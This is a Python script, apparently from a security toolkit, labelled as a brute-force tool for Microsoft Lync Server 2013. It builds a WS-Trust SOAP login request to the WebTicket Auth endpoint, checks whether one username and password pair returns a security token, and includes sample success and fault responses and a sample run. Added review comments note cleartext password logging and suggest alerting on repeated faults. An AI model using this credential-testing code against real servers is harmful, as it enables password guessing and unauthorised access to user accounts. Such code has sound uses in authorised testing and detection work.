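#!/usr/bin/python
# -*- coding: utf-8 -*-

# Purpose: Bruteforce Lync User.
# Product: Microsoft lync server 2013
# Author : Nixawk

import base64
import logging

import requests

logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def lync_login(indexURI, username, password, timeout=30):
    """Submit one username/password pair to the Lync WebTicket service.

    Builds a WS-Trust RequestSecurityToken SOAP envelope carrying a
    UsernameToken and POSTs it to
    ``<indexURI>/WebTicket/WebTicketService.svc/Auth``.

    Args:
        indexURI: Base URL of the Lync front end, without a trailing path.
        username: Account name; base64-encoded into the ``<Username>`` element.
        password: Password; base64-encoded into the ``<Password>`` element.
        timeout: Seconds to wait for the HTTP request before giving up.

    Returns:
        True when the response has status 200 and contains
        ``<RequestedSecurityToken>``; False for any other response or when
        the request raises.
    """
    sapi = "%s/WebTicket/WebTicketService.svc/Auth" % indexURI

    # NOTE(review): base64.b64encode() is handed the arguments as-is, which
    # works for Python 2 byte strings; on Python 3 a text str raises TypeError
    # here, before any request is sent.
    # The Context GUID and the Lifetime timestamps are fixed literals that go
    # unchanged into every request.
    parts = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">',
        '<s:Header>',
        '<Security s:mustUnderstand="1" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">',
        '<UsernameToken>',
        '<Username>%s</Username>' % base64.b64encode(username),
        '<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%s</Password>' % base64.b64encode(password),
        '</UsernameToken>',
        '</Security>',
        '</s:Header>',
        '<s:Body>',
        '<RequestSecurityToken xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" Context="50f2ef42-a03a-fa41-fe45-b032979f3642" xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512">',
        '<TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType>',
        '<RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy">',
        '<EndpointReference xmlns="http://www.w3.org/2005/08/addressing">',
        '<Address>%s/WebTicket/WebTicketService.svc/Auth</Address>' % indexURI,
        '</EndpointReference>',
        '</AppliesTo>',
        '<Lifetime>',
        '<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:00:28Z</Created>',
        '<Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:31:28Z</Expires>',
        '</Lifetime>',
        '<KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType>',
        '</RequestSecurityToken>',
        '</s:Body>',
        '</s:Envelope>',
    )
    data = ''.join(parts)

    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "text/xml",
        "SOAPAction": "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue",
        "Referer": "%s/Dialin/Conference.aspx" % indexURI,
    }

    boolret = False
    try:
        # The context manager closes the session's pooled connections, and
        # the timeout keeps an unresponsive server from blocking forever.
        # post() returns a Response or raises, so no None check is needed.
        with requests.Session() as sess:
            response = sess.post(sapi, headers=headers, data=data,
                                 timeout=timeout)

        # NOTE(review): both messages below write the submitted password to
        # the log in cleartext; treat captured log output as credential
        # material.
        if response.status_code == 200 and "<RequestedSecurityToken>" in response.text:
            log.info("%s/%s - login successfully !", username, password)
            boolret = True

        log.info("%s/%s - login status: %s", username, password, response.status_code)
    except Exception as err:
        log.exception(str(err))

    return boolret


# NOTE(review): a rejected credential comes back as the SOAP fault below
# (a:InvalidSecurityToken, ErrorId 28020). Repeated faults from one source
# against /WebTicket/WebTicketService.svc/Auth are a useful alerting signal,
# alongside account lockout policy and MFA in front of this endpoint.

# Error Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">a:InvalidSecurityToken</faultcode><faultstring xml:lang="zh-CN">No valid security token.</faultstring><detail><OCSDiagnosticsFault xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><Ms-Diagnostics-Fault><ErrorId>28020</ErrorId><Reason>No valid security token.</Reason></Ms-Diagnostics-Fault><NameValuePairs xmlns:a="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></OCSDiagnosticsFault></detail></s:Fault></s:Body></s:Envelope>

# Success Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><RequestSecurityTokenResponseCollection xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><RequestSecurityTokenResponse Context="50f2ef42-a03a-fa41-fe45-b032979f3642"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestedSecurityToken><UserToken xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010">cwt=AAEBHAEFAAAAAAAFFQAAADZZRLr9wt7biZjFdLjiAACBED....eA5TnN-9Gz7aSPI</UserToken></RequestedSecurityToken><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy"><EndpointReference xmlns="http://www.w3.org/2005/08/addressing"><Address>https://lyncpool.example.com/</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:04:22.5149452Z</Created><Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:22:28.5149452Z</Expires></Lifetime><KeySize>0</KeySize></RequestSecurityTokenResponse></RequestSecurityTokenResponseCollection></s:Body></s:Envelope>


if __name__ == '__main__':
    import sys

    # Expects exactly three arguments: base URI, username, password.
    if len(sys.argv) != 4:
        print("[*] python %s <lync URI> <username@mail.com> <password>" % sys.argv[0])
        sys.exit(0)

    # indexURI = "https://lyncpool.example.com"
    indexURI = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    lync_login(indexURI, username, password)


## References

# https://msdn.microsoft.com/en-us/skype/ucwa/ucwaresources
# https://ucwa.skype.com/documentation/keytasks-createapplication
# https://msdn.microsoft.com/en-us/skype/ucwa/authenticationinucwa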
$ python2.7 bruteforce_lync_server2013.py https://lyncpool.example.com "username@example.com/" "password"
INFO:__main__:username@example.com/password - login successfully !
INFO:__main__:username@example.com/password - login status: 200